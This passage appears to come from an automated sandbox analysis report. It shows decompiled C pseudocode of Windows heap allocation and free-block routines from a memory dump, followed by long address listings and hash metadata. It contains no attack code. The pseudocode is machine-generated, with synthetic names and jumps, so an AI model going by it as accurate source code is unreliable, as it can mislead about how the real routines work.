							} else {
								_t370 = _t447;
							}
							__eflags =  *_t370;
							if( *_t370 != 0) {
								_t371 =  *[fs:0x30];
								__eflags =  *(_t371 + 0x240) & 1;
								if(( *(_t371 + 0x240) & 1) != 0) {
									__eflags = E00BE7D50();
									if(__eflags != 0) {
										_t447 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
									}
									E00C81411(_t447, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _v40, _v36,  *_t447 & 0x000000ff);
								}
							}
							_t372 = E00BE7D50();
							_t546 = 0x7ffe038a;
							_t446 = 0x230;
							__eflags = _t372;
							if(_t372 != 0) {
								_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
							} else {
								_t246 = 0x7ffe038a;
							}
							__eflags =  *_t246;
							if( *_t246 == 0) {
								goto L7;
							} else {
								__eflags = E00BE7D50();
								if(__eflags != 0) {
									_t546 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + _t446;
									__eflags = _t546;
								}
								_push( *_t546 & 0x000000ff);
								_push(_v36);
								_push(_v40);
								goto L120;
							}
						}
					} else {
						L19:
						_t31 = _t513 + 0x101f; // 0x101f
						_t455 = _t31 & 0xfffff000;
						_t32 = _t513 + 0x28; // 0x28
						_v44 = _t455;
						__eflags = _t455 - _t32;
						if(_t455 == _t32) {
							_t455 = _t455 + 0x1000;
							_v44 = _t455;
						}
						_t265 = _t445 << 3;
						_v24 = _t265;
						_t266 = _t265 + _t513;
						__eflags = _v40;
						_v20 = _t266;
						if(_v40 == 0) {
							_t266 = _t266 + 0xfffffff0;
							__eflags = _t266;
						}
						_t267 = _t266 & 0xfffff000;
						_v52 = _t267;
						__eflags = _t267 - _t455;
						if(_t267 < _t455) {
							__eflags =  *0xcb8748 - 1; // 0x0
							if(__eflags < 0) {
								L9:
								_t450 = _t553;
								L10:
								_push(_t445);
								goto L11;
							}
							__eflags = _v40;
							L146:
							if(__eflags == 0) {
								goto L9;
							}
							_t270 =  *[fs:0x30];
							__eflags =  *(_t270 + 0xc);
							if( *(_t270 + 0xc) == 0) {
								_push("HEAP: ");
								E00BCB150();
							} else {
								E00BCB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push("(!TrailingUCR)");
							E00BCB150();
							__eflags =  *0xcb7bc8;
							if( *0xcb7bc8 == 0) {
								__eflags = 0;
								E00C82073(_t445, 1, _t541, 0);
							}
							L152:
							_t445 = _a4;
							L153:
							_t513 = _v48;
							goto L9;
						}
						_v32 = _t267;
						_t280 = _t267 - _t455;
						_v32 = _v32 - _t455;
						__eflags = _a8;
						_t460 = _v32;
						_v52 = _t460;
						if(_a8 != 0) {
							L27:
							__eflags = _t280;
							if(_t280 == 0) {
								L33:
								_t446 = 0;
								__eflags = _v40;
								if(_v40 == 0) {
									_t468 = _v44 + _v52;
									_v36 = _t468;
									_t468[2] =  *((intOrPtr*)(_t553 + 0x54));
									__eflags = _v20 - _v52 + _v44;
									if(_v20 == _v52 + _v44) {
										__eflags =  *(_t553 + 0x4c);
										if( *(_t553 + 0x4c) != 0) {
											_t468[1] = _t468[1] ^ _t468[0] ^  *_t468;
											 *_t468 =  *_t468 ^  *(_t553 + 0x50);
										}
									} else {
										_t468[3] = 0;
										_t468[1] = 0;
										_t317 = _v24 - _v52 - _v44 + _t513 >> 0x00000003 & 0x0000ffff;
										_t521 = _t317;
										 *_t468 = _t317;
										__eflags =  *0xcb8748 - 1; // 0x0
										if(__eflags >= 0) {
											__eflags = _t521 - 1;
											if(_t521 <= 1) {
												_t327 =  *[fs:0x30];
												__eflags =  *(_t327 + 0xc);
												if( *(_t327 + 0xc) == 0) {
													_push("HEAP: ");
													E00BCB150();
												} else {
													E00BCB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
												}
												_push("(LONG)FreeEntry->Size > 1");
												E00BCB150();
												__eflags =  *0xcb7bc8 - _t446; // 0x0
												if(__eflags == 0) {
													__eflags = 1;
													E00C82073(_t446, 1, _t541, 1);
												}
												_t468 = _v36;
											}
										}
										_t468[1] = _t446;
										_t522 =  *((intOrPtr*)(_t541 + 0x18));
										__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
										if( *((intOrPtr*)(_t541 + 0x18)) == _t541) {
											_t320 = _t446;
										} else {
											_t320 = (_t468 - _t541 >> 0x10) + 1;
											_v12 = _t320;
											__eflags = _t320 - 0xfe;
											if(_t320 >= 0xfe) {
												_push(_t468);
												_push(_t446);
												E00C8A80D(_t522, 3, _t468, _t541);
												_t468 = _v52;
												_t320 = _v28;
											}
										}
										_t468[3] = _t320;
										E00BEA830(_t553, _t468,  *_t468 & 0x0000ffff);
									}
								}
								E00BEB73D(_t553, _t541, _v44 + 0xffffffe8, _v52, _v48,  &_v8);
								E00BEA830(_t553, _v64, _v24);
								_t286 = E00BE7D50();
								_t542 = 0x7ffe0380;
								__eflags = _t286;
								if(_t286 != 0) {
									_t289 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								} else {
									_t289 = 0x7ffe0380;
								}
								__eflags =  *_t289;
								if( *_t289 != 0) {
									_t290 =  *[fs:0x30];
									__eflags =  *(_t290 + 0x240) & 1;
									if(( *(_t290 + 0x240) & 1) != 0) {
										__eflags = E00BE7D50();
										if(__eflags != 0) {
											_t542 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
											__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										}
										E00C81411(_t446, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _t446, _t446,  *_t542 & 0x000000ff);
									}
								}
								_t291 = E00BE7D50();
								_t543 = 0x7ffe038a;
								__eflags = _t291;
								if(_t291 != 0) {
									_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
								} else {
									_t246 = 0x7ffe038a;
								}
								__eflags =  *_t246;
								if( *_t246 != 0) {
									__eflags = E00BE7D50();
									if(__eflags != 0) {
										_t543 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
										__eflags = _t543;
									}
									_push( *_t543 & 0x000000ff);
									_push(_t446);
									_push(_t446);
									L120:
									_push( *(_t553 + 0x74) << 3);
									_push(_v52);
									_t246 = E00C81411(_t446, _t553, _v44, __eflags);
								}
								goto L7;
							}
							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
							_t339 = E00BF174B( &_v44,  &_v52, 0x4000);
							__eflags = _t339;
							if(_t339 < 0) {
								L94:
								 *((intOrPtr*)(_t553 + 0x210)) =  *((intOrPtr*)(_t553 + 0x210)) + 1;
								__eflags = _v40;
								if(_v40 == 0) {
									goto L153;
								}
								E00BEB73D(_t553, _t541, _v28 + 0xffffffe8, _v36, _v48,  &_a4);
								goto L152;
							}
							_t344 = E00BE7D50();
							__eflags = _t344;
							if(_t344 != 0) {
								_t347 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t347 = 0x7ffe0380;
							}
							__eflags =  *_t347;
							if( *_t347 != 0) {
								_t348 =  *[fs:0x30];
								__eflags =  *(_t348 + 0x240) & 1;
								if(( *(_t348 + 0x240) & 1) != 0) {
									E00C814FB(_t445, _t553, _v44, _v52, 6);
								}
							}
							_t513 = _v48;
							goto L33;
						}
						__eflags =  *_v12 - 3;
						_t513 = _v48;
						if( *_v12 == 3) {
							goto L27;
						}
						__eflags = _t460;
						if(_t460 == 0) {
							goto L9;
						}
						__eflags = _t460 -  *((intOrPtr*)(_t553 + 0x6c));
						if(_t460 <  *((intOrPtr*)(_t553 + 0x6c))) {
							goto L9;
						}
						goto L27;
					}
				}
				_t445 = _a4;
				if(_t445 <  *((intOrPtr*)(__ecx + 0x6c))) {
					_t513 = __edx;
					goto L10;
				}
				_t433 =  *((intOrPtr*)(__ecx + 0x74)) + _t445;
				_v20 = _t433;
				if(_t433 <  *((intOrPtr*)(__ecx + 0x70)) || _v20 <  *(__ecx + 0x1e8) >>  *((intOrPtr*)(__ecx + 0x240)) + 3) {
					_t513 = _t539;
					goto L9;
				} else {
					_t437 = E00BE99BF(__ecx, __edx,  &_a4, 0);
					_t445 = _a4;
					_t514 = _t437;
					_v56 = _t514;
					if(_t445 - 0x201 > 0xfbff) {
						goto L14;
					} else {
						E00BEA830(__ecx, _t514, _t445);
						_t506 =  *(_t553 + 0x238);
						_t551 =  *((intOrPtr*)(_t553 + 0x1e8)) - ( *(_t553 + 0x74) << 3);
						_t246 = _t506 >> 4;
						if(_t551 < _t506 - _t246) {
							_t508 =  *(_t553 + 0x23c);
							_t246 = _t508 >> 2;
							__eflags = _t551 - _t508 - _t246;
							if(_t551 > _t508 - _t246) {
								_t246 = E00BFABD8(_t553);
								 *(_t553 + 0x23c) = _t551;
								 *(_t553 + 0x238) = _t551;
							}
						}
						goto L7;
					}
				}
			}



















































































                                                                                        0x00bea309
                                                                                        0x00bea316
                                                                                        0x00bea319
                                                                                        0x00bea31d
                                                                                        0x00bea32d
                                                                                        0x00bea331
                                                                                        0x00c31e0d
                                                                                        0x00c31e10
                                                                                        0x00bea3cb
                                                                                        0x00bea3cb
                                                                                        0x00bea3bd
                                                                                        0x00bea3c3
                                                                                        0x00bea3c3
                                                                                        0x00bea33a
                                                                                        0x00c31e17
                                                                                        0x00c31e1b
                                                                                        0x00c31e1d
                                                                                        0x00c31e2f
                                                                                        0x00c31e34
                                                                                        0x00c31e36
                                                                                        0x00c31e3c
                                                                                        0x00c31e3c
                                                                                        0x00c31e3c
                                                                                        0x00c31e3c
                                                                                        0x00c31e36
                                                                                        0x00c31e42
                                                                                        0x00c31e45
                                                                                        0x00c31e47
                                                                                        0x00bea3f8
                                                                                        0x00bea3f8
                                                                                        0x00bea3fb
                                                                                        0x00bea3fd
                                                                                        0x00c31e50
                                                                                        0x00bea403
                                                                                        0x00bea411
                                                                                        0x00bea411
                                                                                        0x00bea411
                                                                                        0x00bea41e
                                                                                        0x00bea420
                                                                                        0x00bea424
                                                                                        0x00bea427
                                                                                        0x00bea7c9
                                                                                        0x00bea7cd
                                                                                        0x00bea7d2
                                                                                        0x00bea7d9
                                                                                        0x00bea7e0
                                                                                        0x00bea7e3
                                                                                        0x00bea7ed
                                                                                        0x00bea7f3
                                                                                        0x00bea7f9
                                                                                        0x00bea7ff
                                                                                        0x00bea802
                                                                                        0x00bea807
                                                                                        0x00bea809
                                                                                        0x00bea809
                                                                                        0x00bea809
                                                                                        0x00bea80f
                                                                                        0x00bea80f
                                                                                        0x00bea812
                                                                                        0x00bea81c
                                                                                        0x00bea821
                                                                                        0x00bea824
                                                                                        0x00bea42d
                                                                                        0x00bea42d
                                                                                        0x00bea42d
                                                                                        0x00bea42d
                                                                                        0x00bea42d
                                                                                        0x00bea436
                                                                                        0x00bea43a
                                                                                        0x00bea609
                                                                                        0x00bea60d
                                                                                        0x00bea612
                                                                                        0x00bea616
                                                                                        0x00bea61a
                                                                                        0x00c31e57
                                                                                        0x00c31e59
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00c31e5f
                                                                                        0x00bea620
                                                                                        0x00bea627
                                                                                        0x00c31e64
                                                                                        0x00c31e66
                                                                                        0x00c31e6c
                                                                                        0x00c31e72
                                                                                        0x00c31e76
                                                                                        0x00c31e95
                                                                                        0x00c31e9a
                                                                                        0x00c31e78
                                                                                        0x00c31e8d
                                                                                        0x00c31e92
                                                                                        0x00c31ea0
                                                                                        0x00c31ea5
                                                                                        0x00c31eaa
                                                                                        0x00c31eb2
                                                                                        0x00c31eb6
                                                                                        0x00c31eb9
                                                                                        0x00c31eb9
                                                                                        0x00c31ebe
                                                                                        0x00c31ec2
                                                                                        0x00c31ec2
                                                                                        0x00c31e66
                                                                                        0x00bea62d
                                                                                        0x00bea633
                                                                                        0x00bea636
                                                                                        0x00bea63a
                                                                                        0x00bea63c
                                                                                        0x00bea640
                                                                                        0x00bea642
                                                                                        0x00bea644
                                                                                        0x00bea644
                                                                                        0x00bea644
                                                                                        0x00bea64d
                                                                                        0x00bea64d
                                                                                        0x00bea651
                                                                                        0x00bea655
                                                                                        0x00c31eca
                                                                                        0x00c31ed1
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00c31ed7
                                                                                        0x00000000
                                                                                        0x00bea65b
                                                                                        0x00bea669
                                                                                        0x00bea66e
                                                                                        0x00bea670
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00bea676
                                                                                        0x00bea67b
                                                                                        0x00bea680
                                                                                        0x00bea682
                                                                                        0x00c31f1a
                                                                                        0x00bea688
                                                                                        0x00bea688
                                                                                        0x00bea688
                                                                                        0x00bea68a
                                                                                        0x00bea68d
                                                                                        0x00c31f24
                                                                                        0x00c31f2a
                                                                                        0x00c31f31
                                                                                        0x00c31f43
                                                                                        0x00c31f43
                                                                                        0x00c31f31
                                                                                        0x00bea693
                                                                                        0x00bea697
                                                                                        0x00bea69d
                                                                                        0x00bea6a0
                                                                                        0x00bea6a6
                                                                                        0x00bea6a8
                                                                                        0x00bea6a8
                                                                                        0x00bea6a8
                                                                                        0x00bea6a8
                                                                                        0x00bea6b2
                                                                                        0x00bea6b7
                                                                                        0x00bea6c1
                                                                                        0x00bea6c6
                                                                                        0x00bea6d2
                                                                                        0x00bea6d9
                                                                                        0x00bea6e3
                                                                                        0x00bea6e6
                                                                                        0x00bea6eb
                                                                                        0x00bea6ed
                                                                                        0x00bea6ed
                                                                                        0x00bea6ed
                                                                                        0x00bea6ed
                                                                                        0x00bea6f3
                                                                                        0x00bea6f8
                                                                                        0x00bea702
                                                                                        0x00bea70a
                                                                                        0x00bea70e
                                                                                        0x00bea71a
                                                                                        0x00bea71e
                                                                                        0x00c31fcb
                                                                                        0x00c31fcf
                                                                                        0x00c31fdd
                                                                                        0x00c31fe3
                                                                                        0x00c31fe3
                                                                                        0x00bea724
                                                                                        0x00bea728
                                                                                        0x00bea72a
                                                                                        0x00bea72d
                                                                                        0x00bea737
                                                                                        0x00bea73a
                                                                                        0x00bea73c
                                                                                        0x00bea742
                                                                                        0x00bea748
                                                                                        0x00c31f4d
                                                                                        0x00c31f50
                                                                                        0x00c31f56
                                                                                        0x00c31f5c
                                                                                        0x00c31f5f
                                                                                        0x00c31f7e
                                                                                        0x00c31f83
                                                                                        0x00c31f61
                                                                                        0x00c31f76
                                                                                        0x00c31f7b
                                                                                        0x00c31f89
                                                                                        0x00c31f8e
                                                                                        0x00c31f93
                                                                                        0x00c31f94
                                                                                        0x00c31f9a
                                                                                        0x00c31f9c
                                                                                        0x00c31f9e
                                                                                        0x00c31fa1
                                                                                        0x00c31fa1
                                                                                        0x00c31fa6
                                                                                        0x00c31fa6
                                                                                        0x00c31f50
                                                                                        0x00bea74e
                                                                                        0x00bea751
                                                                                        0x00bea754
                                                                                        0x00bea75d
                                                                                        0x00bea75e
                                                                                        0x00bea762
                                                                                        0x00bea767
                                                                                        0x00c31faf
                                                                                        0x00c31fb0
                                                                                        0x00c31fb9
                                                                                        0x00c31fbe
                                                                                        0x00c31fc2
                                                                                        0x00c31fc2
                                                                                        0x00bea76d
                                                                                        0x00bea76d
                                                                                        0x00bea775
                                                                                        0x00bea778
                                                                                        0x00bea77d
                                                                                        0x00bea77d
                                                                                        0x00bea71e
                                                                                        0x00bea782
                                                                                        0x00bea787
                                                                                        0x00bea789
                                                                                        0x00c31ff3
                                                                                        0x00bea78f
                                                                                        0x00bea78f
                                                                                        0x00bea78f
                                                                                        0x00bea791
                                                                                        0x00bea794
                                                                                        0x00c31ffd
                                                                                        0x00c32006
                                                                                        0x00c3200c
                                                                                        0x00c32017
                                                                                        0x00c32019
                                                                                        0x00c32024
                                                                                        0x00c32024
                                                                                        0x00c32024
                                                                                        0x00c32047
                                                                                        0x00c32047
                                                                                        0x00c3200c
                                                                                        0x00bea79a
                                                                                        0x00bea79f
                                                                                        0x00bea7a4
                                                                                        0x00bea7a9
                                                                                        0x00bea7ab
                                                                                        0x00c3205a
                                                                                        0x00bea7b1
                                                                                        0x00bea7b1
                                                                                        0x00bea7b1
                                                                                        0x00bea7b3
                                                                                        0x00bea7b6
                                                                                        0x00000000
                                                                                        0x00bea7bc
                                                                                        0x00c32066
                                                                                        0x00c32068
                                                                                        0x00c32073
                                                                                        0x00c32073
                                                                                        0x00c32073
                                                                                        0x00c32078
                                                                                        0x00c32079
                                                                                        0x00c3207d
                                                                                        0x00000000
                                                                                        0x00c3207d
                                                                                        0x00bea7b6
                                                                                        0x00bea440
                                                                                        0x00bea440
                                                                                        0x00bea440
                                                                                        0x00bea446
                                                                                        0x00bea44c
                                                                                        0x00bea44f
                                                                                        0x00bea453
                                                                                        0x00bea455
                                                                                        0x00c320b3
                                                                                        0x00c320b9
                                                                                        0x00c320b9
                                                                                        0x00bea45d
                                                                                        0x00bea460
                                                                                        0x00bea464
                                                                                        0x00bea466
                                                                                        0x00bea46b
                                                                                        0x00bea46f
                                                                                        0x00bea471
                                                                                        0x00bea471
                                                                                        0x00bea471
                                                                                        0x00bea474
                                                                                        0x00bea479
                                                                                        0x00bea47d
                                                                                        0x00bea47f
                                                                                        0x00c32229
                                                                                        0x00c3222f
                                                                                        0x00bea3c8
                                                                                        0x00bea3c8
                                                                                        0x00bea3ca
                                                                                        0x00bea3ca
                                                                                        0x00000000
                                                                                        0x00bea3ca
                                                                                        0x00c32235
                                                                                        0x00c3223a
                                                                                        0x00c3223a
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00c32240
                                                                                        0x00c32246
                                                                                        0x00c3224a
                                                                                        0x00c32269
                                                                                        0x00c3226e
                                                                                        0x00c3224c
                                                                                        0x00c32261
                                                                                        0x00c32266
                                                                                        0x00c32274
                                                                                        0x00c32279
                                                                                        0x00c3227e
                                                                                        0x00c32286
                                                                                        0x00c32288
                                                                                        0x00c3228d
                                                                                        0x00c3228d
                                                                                        0x00c32292
                                                                                        0x00c32292
                                                                                        0x00c32295
                                                                                        0x00c32295
                                                                                        0x00000000
                                                                                        0x00c32295
                                                                                        0x00bea485
                                                                                        0x00bea489
                                                                                        0x00bea48b
                                                                                        0x00bea48f
                                                                                        0x00bea493
                                                                                        0x00bea497
                                                                                        0x00bea49b
                                                                                        0x00bea4bb
                                                                                        0x00bea4bb
                                                                                        0x00bea4bd
                                                                                        0x00bea4ff
                                                                                        0x00bea4ff
                                                                                        0x00bea501
                                                                                        0x00bea505
                                                                                        0x00bea50f
                                                                                        0x00bea517
                                                                                        0x00bea51b
                                                                                        0x00bea527
                                                                                        0x00bea52b
                                                                                        0x00c32182
                                                                                        0x00c32185
                                                                                        0x00c32193
                                                                                        0x00c32199
                                                                                        0x00c32199
                                                                                        0x00bea531
                                                                                        0x00bea535
                                                                                        0x00bea538
                                                                                        0x00bea548
                                                                                        0x00bea54b
                                                                                        0x00bea54d
                                                                                        0x00bea553
                                                                                        0x00bea559
                                                                                        0x00c32100
                                                                                        0x00c32103
                                                                                        0x00c32109
                                                                                        0x00c3210f
                                                                                        0x00c32112
                                                                                        0x00c32131
                                                                                        0x00c32136
                                                                                        0x00c32114
                                                                                        0x00c32129
                                                                                        0x00c3212e
                                                                                        0x00c3213c
                                                                                        0x00c32141
                                                                                        0x00c32147
                                                                                        0x00c3214d
                                                                                        0x00c32151
                                                                                        0x00c32154
                                                                                        0x00c32154
                                                                                        0x00c32159
                                                                                        0x00c32159
                                                                                        0x00c32103
                                                                                        0x00bea55f
                                                                                        0x00bea562
                                                                                        0x00bea565
                                                                                        0x00bea567
                                                                                        0x00c32162
                                                                                        0x00bea56d
                                                                                        0x00bea574
                                                                                        0x00bea575
                                                                                        0x00bea579
                                                                                        0x00bea57e
                                                                                        0x00c32169
                                                                                        0x00c3216a
                                                                                        0x00c32170
                                                                                        0x00c32175
                                                                                        0x00c32179
                                                                                        0x00c32179
                                                                                        0x00bea57e
                                                                                        0x00bea584
                                                                                        0x00bea58f
                                                                                        0x00bea58f
                                                                                        0x00bea52b
                                                                                        0x00bea5ad
                                                                                        0x00bea5bc
                                                                                        0x00bea5c1
                                                                                        0x00bea5c6
                                                                                        0x00bea5cb
                                                                                        0x00bea5cd
                                                                                        0x00c321a9
                                                                                        0x00bea5d3
                                                                                        0x00bea5d3
                                                                                        0x00bea5d3
                                                                                        0x00bea5d5
                                                                                        0x00bea5d8
                                                                                        0x00c321b3
                                                                                        0x00c321bc
                                                                                        0x00c321c2
                                                                                        0x00c321cd
                                                                                        0x00c321cf
                                                                                        0x00c321da
                                                                                        0x00c321da
                                                                                        0x00c321da
                                                                                        0x00c321f7
                                                                                        0x00c321f7
                                                                                        0x00c321c2
                                                                                        0x00bea5de
                                                                                        0x00bea5e3
                                                                                        0x00bea5e8
                                                                                        0x00bea5ea
                                                                                        0x00c3220a
                                                                                        0x00bea5f0
                                                                                        0x00bea5f0
                                                                                        0x00bea5f0
                                                                                        0x00bea5f2
                                                                                        0x00bea5f5
                                                                                        0x00c32219
                                                                                        0x00c3221b
                                                                                        0x00c3208c
                                                                                        0x00c3208c
                                                                                        0x00c3208c
                                                                                        0x00c32095
                                                                                        0x00c32096
                                                                                        0x00c32097
                                                                                        0x00c32098
                                                                                        0x00c320a4
                                                                                        0x00c320a5
                                                                                        0x00c320a9
                                                                                        0x00c320a9
                                                                                        0x00000000
                                                                                        0x00bea5f5
                                                                                        0x00bea4bf
                                                                                        0x00bea4d3
                                                                                        0x00bea4d8
                                                                                        0x00bea4da
                                                                                        0x00c31ede
                                                                                        0x00c31ede
                                                                                        0x00c31ee4
                                                                                        0x00c31ee9
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00c31f07
                                                                                        0x00000000
                                                                                        0x00c31f07
                                                                                        0x00bea4e0
                                                                                        0x00bea4e5
                                                                                        0x00bea4e7
                                                                                        0x00c320cb
                                                                                        0x00bea4ed
                                                                                        0x00bea4ed
                                                                                        0x00bea4ed
                                                                                        0x00bea4f2
                                                                                        0x00bea4f5
                                                                                        0x00c320d5
                                                                                        0x00c320de
                                                                                        0x00c320e4
                                                                                        0x00c320f6
                                                                                        0x00c320f6
                                                                                        0x00c320e4
                                                                                        0x00bea4fb
                                                                                        0x00000000
                                                                                        0x00bea4fb
                                                                                        0x00bea4a1
                                                                                        0x00bea4a4
                                                                                        0x00bea4a8
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00bea4aa
                                                                                        0x00bea4ac
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00bea4b2
                                                                                        0x00bea4b5
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00bea4b5
                                                                                        0x00bea43a
                                                                                        0x00bea340
                                                                                        0x00bea346
                                                                                        0x00bea600
                                                                                        0x00000000
                                                                                        0x00bea600
                                                                                        0x00bea34f
                                                                                        0x00bea351
                                                                                        0x00bea358
                                                                                        0x00bea3c6
                                                                                        0x00000000
                                                                                        0x00bea371
                                                                                        0x00bea37a
                                                                                        0x00bea37f
                                                                                        0x00bea382
                                                                                        0x00bea384
                                                                                        0x00bea394
                                                                                        0x00000000
                                                                                        0x00bea396
                                                                                        0x00bea399
                                                                                        0x00bea3a7
                                                                                        0x00bea3b0
                                                                                        0x00bea3b4
                                                                                        0x00bea3bb
                                                                                        0x00bea3d2
                                                                                        0x00bea3da
                                                                                        0x00bea3df
                                                                                        0x00bea3e1
                                                                                        0x00bea3e5
                                                                                        0x00bea3ea
                                                                                        0x00bea3f0
                                                                                        0x00bea3f0
                                                                                        0x00bea3e1
                                                                                        0x00000000
                                                                                        0x00bea3bb
                                                                                        0x00bea394

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                                        • API String ID: 0-523794902
                                                                                        • Opcode ID: 540fdbda25a4683800cb0940a27403b641b9606e69653c215b525f1c30495404
                                                                                        • Instruction ID: 17ba0c2487460bf1b5b7cc31d3f853f5bc8c9bfd7d6e2eb420aee50273f42253
                                                                                        • Opcode Fuzzy Hash: 540fdbda25a4683800cb0940a27403b641b9606e69653c215b525f1c30495404
                                                                                        • Instruction Fuzzy Hash: 7842CD312187819FC715DF29C884B2ABBE9EF88704F1849ADF8968B352D734ED45CB52
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C82D82, Relevance: 7.7, Strings: 6, Instructions: 228COMMONCrypto
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 64%
                                                                                        			E00C82D82(void* __ebx, intOrPtr* __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t83;
				signed char _t89;
				intOrPtr _t90;
				signed char _t101;
				signed int _t102;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				intOrPtr _t108;
				intOrPtr _t112;
				short* _t130;
				short _t131;
				signed int _t148;
				intOrPtr _t149;
				signed int* _t154;
				short* _t165;
				signed int _t171;
				void* _t182;

				_push(0x44);
				_push(0xca0e80);
				E00C1D0E8(__ebx, __edi, __esi);
				_t177 = __edx;
				_t181 = __ecx;
				 *((intOrPtr*)(_t182 - 0x44)) = __ecx;
				 *((char*)(_t182 - 0x1d)) = 0;
				 *(_t182 - 0x24) = 0;
				if(( *(__ecx + 0x44) & 0x01000000) == 0) {
					 *((intOrPtr*)(_t182 - 4)) = 0;
					 *((intOrPtr*)(_t182 - 4)) = 1;
					_t83 = E00BC40E1("RtlAllocateHeap");
					__eflags = _t83;
					if(_t83 == 0) {
						L48:
						 *(_t182 - 0x24) = 0;
						L49:
						 *((intOrPtr*)(_t182 - 4)) = 0;
						 *((intOrPtr*)(_t182 - 4)) = 0xfffffffe;
						E00C830C4();
						goto L50;
					}
					_t89 =  *(__ecx + 0x44) | __edx | 0x10000100;
					 *(_t182 - 0x28) = _t89;
					 *(_t182 - 0x3c) = _t89;
					_t177 =  *(_t182 + 8);
					__eflags = _t177;
					if(_t177 == 0) {
						_t171 = 1;
						__eflags = 1;
					} else {
						_t171 = _t177;
					}
					_t148 =  *((intOrPtr*)(_t181 + 0x94)) + _t171 &  *(_t181 + 0x98);
					__eflags = _t148 - 0x10;
					if(_t148 < 0x10) {
						_t148 = 0x10;
					}
					_t149 = _t148 + 8;
					 *((intOrPtr*)(_t182 - 0x48)) = _t149;
					__eflags = _t149 - _t177;
					if(_t149 < _t177) {
						L44:
						_t90 =  *[fs:0x30];
						__eflags =  *(_t90 + 0xc);
						if( *(_t90 + 0xc) == 0) {
							_push("HEAP: ");
							E00BCB150();
						} else {
							E00BCB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push( *((intOrPtr*)(_t181 + 0x78)));
						E00BCB150("Invalid allocation size - %Ix (exceeded %Ix)\n", _t177);
						goto L48;
					} else {
						__eflags = _t149 -  *((intOrPtr*)(_t181 + 0x78));
						if(_t149 >  *((intOrPtr*)(_t181 + 0x78))) {
							goto L44;
						}
						__eflags = _t89 & 0x00000001;
						if((_t89 & 0x00000001) != 0) {
							_t178 =  *(_t182 - 0x28);
						} else {
							E00BDEEF0( *((intOrPtr*)(_t181 + 0xc8)));
							 *((char*)(_t182 - 0x1d)) = 1;
							_t178 =  *(_t182 - 0x28) | 0x00000001;
							 *(_t182 - 0x3c) =  *(_t182 - 0x28) | 0x00000001;
						}
						E00C84496(_t181, 0);
						_t177 = L00BE4620(_t181, _t181, _t178,  *(_t182 + 8));
						 *(_t182 - 0x24) = _t177;
						_t173 = 1;
						E00C849A4(_t181);
						__eflags = _t177;
						if(_t177 == 0) {
							goto L49;
						} else {
							_t177 = _t177 + 0xfffffff8;
							__eflags =  *((char*)(_t177 + 7)) - 5;
							if( *((char*)(_t177 + 7)) == 5) {
								_t177 = _t177 - (( *(_t177 + 6) & 0x000000ff) << 3);
								__eflags = _t177;
							}
							_t154 = _t177;
							 *(_t182 - 0x40) = _t177;
							__eflags =  *(_t181 + 0x4c);
							if( *(_t181 + 0x4c) != 0) {
								 *_t177 =  *_t177 ^  *(_t181 + 0x50);
								__eflags =  *(_t177 + 3) - (_t154[0] ^ _t154[0] ^  *_t154);
								if(__eflags != 0) {
									_push(_t154);
									_t173 = _t177;
									E00C7FA2B(0, _t181, _t177, _t177, _t181, __eflags);
								}
							}
							__eflags =  *(_t177 + 2) & 0x00000002;
							if(( *(_t177 + 2) & 0x00000002) == 0) {
								_t101 =  *(_t177 + 3);
								 *(_t182 - 0x29) = _t101;
								_t102 = _t101 & 0x000000ff;
							} else {
								_t130 = E00BC1F5B(_t177);
								 *((intOrPtr*)(_t182 - 0x30)) = _t130;
								__eflags =  *(_t181 + 0x40) & 0x08000000;
								if(( *(_t181 + 0x40) & 0x08000000) == 0) {
									 *_t130 = 0;
								} else {
									_t131 = E00BF16C7(1, _t173);
									_t165 =  *((intOrPtr*)(_t182 - 0x30));
									 *_t165 = _t131;
									_t130 = _t165;
								}
								_t102 =  *(_t130 + 2) & 0x0000ffff;
							}
							 *(_t182 - 0x34) = _t102;
							 *(_t182 - 0x28) = _t102;
							__eflags =  *(_t181 + 0x4c);
							if( *(_t181 + 0x4c) != 0) {
								 *(_t177 + 3) =  *(_t177 + 2) ^  *(_t177 + 1) ^  *_t177;
